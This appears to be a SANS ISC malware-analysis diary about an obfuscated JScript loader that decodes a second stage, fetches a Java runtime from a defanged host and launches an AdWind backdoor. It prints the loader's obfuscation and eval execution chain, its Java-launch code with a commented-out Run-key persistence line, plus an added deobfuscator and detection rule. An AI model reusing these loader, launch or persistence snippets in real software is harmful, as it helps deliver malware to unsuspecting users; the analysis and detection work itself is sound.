If You Want Something Done Right, You Have To Do It Yourself... Malware Too!

Published: 2020-07-08
Last Updated: 2020-07-08 05:13:33 UTC
by Xavier Mertens (Version: 1)

I’m teaching FOR610[1] this week and today is dedicated to malicious web and document files. That’s a good opportunity to share with you a Windows Script that uses a nice obfuscation technique. The attacker's idea is to use a big array containing the second stage payload and interesting strings:

var Kerosene = [
function(){
var Odds = "m!FyIG5lbTQ0Ow0Km!FyIGxvb!mUZXh0ID0gIlVFc0RC….";
return [function(){
eval("Odds = Odds.replace(new RegExp(\"!@@\", \"g\"), \"A\");");
eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x6D\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x64\x22\x29\x3B");
eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x21\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x6D\x22\x29\x3B");
return Odds;
}][0]();
},
Array("CreateObject","ReadText","undefined","\x61\x64\x6F\x64\x62\x2E","\x43\x68\x61\x72\x53\x65\x74","\x50\x6F\x73\x69\x74\x69\x6F\x6E","\x54\x79\x70\x65","Open","Write","nodeTypedValue"),null
];

The script is JScript, Microsoft's JavaScript dialect executed by the Windows Script Host, and like any JavaScript it is very permissive about data types: functions, strings, arrays and null can live in the same array. The first element of Kerosene[] is a function that deobfuscates a very long string polluted with character substitutions: "!@@" is replaced with "A", then "m" with "d", then "!" with "m" (the two hex-escaped strings passed to eval() are just these last two replace() calls spelled out byte by byte). Once the characters are restored, the Base64 string decodes to the second payload. The second element is an array of strings, some of them hex-encoded, that will be used as method and property names (CreateObject, ReadText, CharSet, Position, Type, Open, Write, nodeTypedValue). Then the following code is executed:

// Kerosene[1][0] is "CreateObject": an ADODB.Stream, an MSXML DOM element
// and a small object holding the charset "us-ascii"
Kerosene[3] = Array(WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D"),
                    WSH[Kerosene[1][0]]("microsoft.xmldom").createElement("cfg"),
                    {bmx: "\x75\x73\x2D\x61\x73\x63\x69\x69"});
// accessor returning the ADODB.Stream
Kerosene[4] = function(){return Kerosene[3][0];};
[function(){
  // the DOM element does the Base64 decoding: with dataType "bin.base64",
  // nodeTypedValue returns the raw bytes of the deobfuscated string
  Kerosene[3][1].dataType = "\x62\x69\x6E\x2E\x62\x61\x73\x65\x36\x34";
  Kerosene[3][1].text = Kerosene[0]();
  [function(){
    // stream.Type = 1 (binary); stream.Open(); stream.Write(cfg.nodeTypedValue);
    eval("Kerosene[4]()[Kerosene[1][6]] = 1;Kerosene[4]()[Kerosene[1][7]]();Kerosene[4]()[Kerosene[1][8]](Kerosene[3][1][Kerosene[1][9]]);");
    // stream.Position = 0; stream.Type = 2 (text);
    eval("Kerosene[4]()[Kerosene[1][5]] = 0;Kerosene[4]()[Kerosene[1][6]] = 2;");
    // stream.CharSet = "us-ascii";
    eval("Kerosene[4]()[Kerosene[1][4]] = Kerosene[3][2].bmx;");
    // the array is rebuilt as [[eval], stream, ["ReadText"]]
    eval("Kerosene = [Array(eval), Kerosene[4](), [Kerosene[1][1]]];");
  }][0]();
}][0]();

// i.e. eval(stream.ReadText()): the decoded second stage is executed
Kerosene[0][0](Kerosene[1][Kerosene[2]]());

How does it work? Every reference to an array element is resolved to its value at execution time, so the method and property names never appear in clear text in the script. Example:

WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D")

becomes:

WSH["CreateObject"]("adodb.stream")

which is simply WSH.CreateObject("adodb.stream"). The same trick hides the last line: after the array has been rebuilt, Kerosene[0][0] is eval, Kerosene[1] is the ADODB stream and Kerosene[2] is ["ReadText"] (an array used as a property key is coerced to the string "ReadText"), so the line reads eval(stream.ReadText()) and runs the decoded second stage. Note that the Base64 decoding itself is delegated to MSXML: setting dataType to "bin.base64" on the DOM element makes nodeTypedValue return the raw bytes, which are written to the stream in binary mode and read back as text.
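To see the decoding in practice, here is an added example (it is neither part of the diary nor the attacker's code): a small Node.js script that applies the three substitutions in the order the loader does and Base64-decodes the result. The only input available on the page is the prefix of the Odds string quoted above, so that is what it decodes; the helper for "\xNN" escapes is for reading the raw script text, for instance the eval() arguments. Function and constant names are mine.

```javascript
// Added example, not the diary's or the attacker's code: recover the second
// stage from the "Odds" string by undoing the three replace() calls that the
// loader runs through eval(), then Base64-decoding the result.

// The order is the loader's and it matters: "!@@" must become "A" before "!"
// becomes "m", and "m" must become "d" before the new "m"s are introduced.
const SUBSTITUTIONS = [
  [/!@@/g, "A"],
  [/m/g, "d"],
  [/!/g, "m"],
];

// Apply the substitutions; the result should be plain Base64.
function restoreBase64(odds) {
  return SUBSTITUTIONS.reduce((s, [re, rep]) => s.replace(re, rep), odds);
}

// Base64-decode the restored string. Bytes are mapped 1:1 (latin1) so a binary
// payload would survive. Throws if the substitution did not yield clean Base64,
// which is the quickest way to notice a variant that uses a different alphabet.
function deobfuscate(odds) {
  const b64 = restoreBase64(odds);
  if (!/^[A-Za-z0-9+\/]*={0,2}$/.test(b64)) {
    throw new Error("not clean Base64 after substitution: " + b64.slice(0, 40));
  }
  return Buffer.from(b64, "base64").toString("latin1");
}

// The eval()'d arguments are plain "\xNN" escapes. When reading the raw script
// text (not a live JS value) this turns them back into readable source.
function decodeHexEscapes(raw) {
  return raw.replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Prefix of Odds exactly as quoted in the diary; the full string is not on the page.
const ODDS_PREFIX = "m!FyIG5lbTQ0Ow0Km!FyIGxvb!mUZXh0ID0gIlVFc0RC";

// Second eval() argument of the loader, as it appears in the raw script text.
const EVAL_ARG_RAW = String.raw`\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x6D\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x64\x22\x29\x3B`;

console.log(restoreBase64(ODDS_PREFIX));
console.log(JSON.stringify(deobfuscate(ODDS_PREFIX)));
console.log(decodeHexEscapes(EVAL_ARG_RAW));
```

Even the short prefix is telling: it decodes to `var nem44;` followed by `var longText = "UEsDB`, and UEsDB is the Base64 encoding of the ZIP local file header (PK\x03\x04), so the second stage is already carrying a Zip archive inline. The hex-escaped eval() argument decodes to `Odds = Odds.replace(new RegExp("m", "g"), "d");`, which is where the substitution order comes from.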

The second payload uses the same obfuscation technique (a Base64 payload decoded after replacing some garbage characters). The script lives up to the title of this diary: it does not count on a Java runtime being present on the victim's computer. The interesting function is GrabJreFromNet(), which downloads a Java Runtime Environment if none is installed. The package is grabbed from this URL: hxxp://ops[.]com[.]pa/jre7.zip

The script performs the following test to detect whether Java is available:

// wshShell (a WScript.Shell object) and stubpath (the path of the dropped JAR)
// are set elsewhere in the script.
var text = "";
// First look for a 32-bit JRE registered under Wow6432Node (64-bit Windows).
try {
  text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");
  text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");
} catch(err) {}
// Then fall back to the native registry view. Note the sloppiness: if the first
// RegRead above succeeded but the second one failed, text still holds the bare
// version string and "\bin\javaw.exe" is appended to it.
try {
  if (text == "") {
    text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");
    text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");
    if (text != "") {
      text = text + "\\bin\\javaw.exe";
    }
  }
  else {
    text = text + "\\bin\\javaw.exe";
  }
} catch(err) {}
// Run the JAR with the JRE found, otherwise download one. Persistence through
// the HKCU Run key (value name "ntfsmgr") is present but commented out in this sample.
try {
  if (text != "") {
    //wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");
    wshShell.run ("\"" + text + "\" -jar \"" + stubpath + "\"");
  } else {
    GrabJreFromNet();
  }
} catch(err) {}
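As an added example (not from the diary and not the malware's code), here is the check a detection engineer can derive from this snippet: a Windows Script Host process spawning javaw.exe with -jar, which is exactly what wshShell.run() produces once a JRE has been found. A second rule covers the commented-out Run-key persistence, where the parent at logon would be explorer.exe and the only visible trace is a JAR executed from a user profile directory. It runs offline in Node.js over a few constructed process-creation events in a Sysmon-style shape; the field names, paths and file names are assumptions, not indicators from the sample.

```javascript
// Added example, not code from the diary or the malware: flag the process
// relationship the script creates (script host -> javaw.exe -jar <stub>).
// Field names follow a Sysmon-style process-creation record; the events
// below are constructed for the example and are not real telemetry.

const SCRIPT_HOSTS = new Set(["wscript.exe", "cscript.exe"]);
const JAVA_LAUNCHERS = new Set(["javaw.exe", "java.exe"]);

// Last path component, lower-cased, for either slash style.
function baseName(path) {
  return path.split(/[\\\/]/).pop().toLowerCase();
}

// Returns a short reason when the event matches one of the rules, else null.
function classify(ev) {
  const image = baseName(ev.Image || "");
  const parent = baseName(ev.ParentImage || "");
  const cmd = ev.CommandLine || "";
  if (!JAVA_LAUNCHERS.has(image) || !/\s-jar\s/i.test(cmd)) {
    return null;
  }
  // Rule 1: the behaviour of this sample. wshShell.run("javaw.exe -jar <stub>")
  // makes javaw.exe a child of the script host that executed the loader.
  if (SCRIPT_HOSTS.has(parent)) {
    return parent + " launched " + image + " with -jar";
  }
  // Rule 2: the persistence the script carries (commented out) would register
  // the same command under HKCU\...\Run, so at logon the parent is explorer.exe.
  // A JAR executed from a user's AppData directory is the trace that remains.
  if (/-jar\s+"?[A-Za-z]:\\Users\\[^"\s]*\\AppData\\/i.test(cmd)) {
    return image + " runs a JAR from a user's AppData";
  }
  return null;
}

// Runs the rules over a list of events and returns the matches.
function findSuspicious(events) {
  return events
    .map((ev) => ({ id: ev.Id, reason: classify(ev) }))
    .filter((r) => r.reason !== null);
}

// Constructed sample events (assumed field names, paths and file names).
const SAMPLE_EVENTS = [
  { Id: 1, ParentImage: "C:\\Windows\\System32\\wscript.exe",
    Image: "C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe",
    CommandLine: "\"C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe\" -jar \"C:\\Users\\bob\\AppData\\Roaming\\stub.jar\"" },
  { Id: 2, ParentImage: "C:\\Windows\\explorer.exe",
    Image: "C:\\Program Files\\Java\\jre7\\bin\\javaw.exe",
    CommandLine: "\"C:\\Program Files\\Java\\jre7\\bin\\javaw.exe\" -jar \"C:\\Program Files\\SomeApp\\app.jar\"" },
  { Id: 3, ParentImage: "C:\\Windows\\explorer.exe",
    Image: "C:\\Program Files\\Java\\jre7\\bin\\javaw.exe",
    CommandLine: "\"C:\\Program Files\\Java\\jre7\\bin\\javaw.exe\" -jar \"C:\\Users\\bob\\AppData\\Roaming\\stub.jar\"" },
  { Id: 4, ParentImage: "C:\\Windows\\System32\\cscript.exe",
    Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    CommandLine: "powershell.exe -nop -w hidden" },
];

console.log(findSuspicious(SAMPLE_EVENTS));
```

Rule 1 is the one with real signal: a script host launching a JAR is rare in most environments. Rule 2 needs tuning (legitimate tools do run JARs from AppData), so treat it as a hunting query rather than an alert. A download of jre7.zip by a script host, the GrabJreFromNet() path, is a separate, network-side indicator that this check does not cover.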

The third payload is a JAR file (a Zip archive) containing a classic AdWind backdoor (SHA256: 3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab)[2].

[1] http://for610.com
[2] https://www.virustotal.com/gui/file/3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant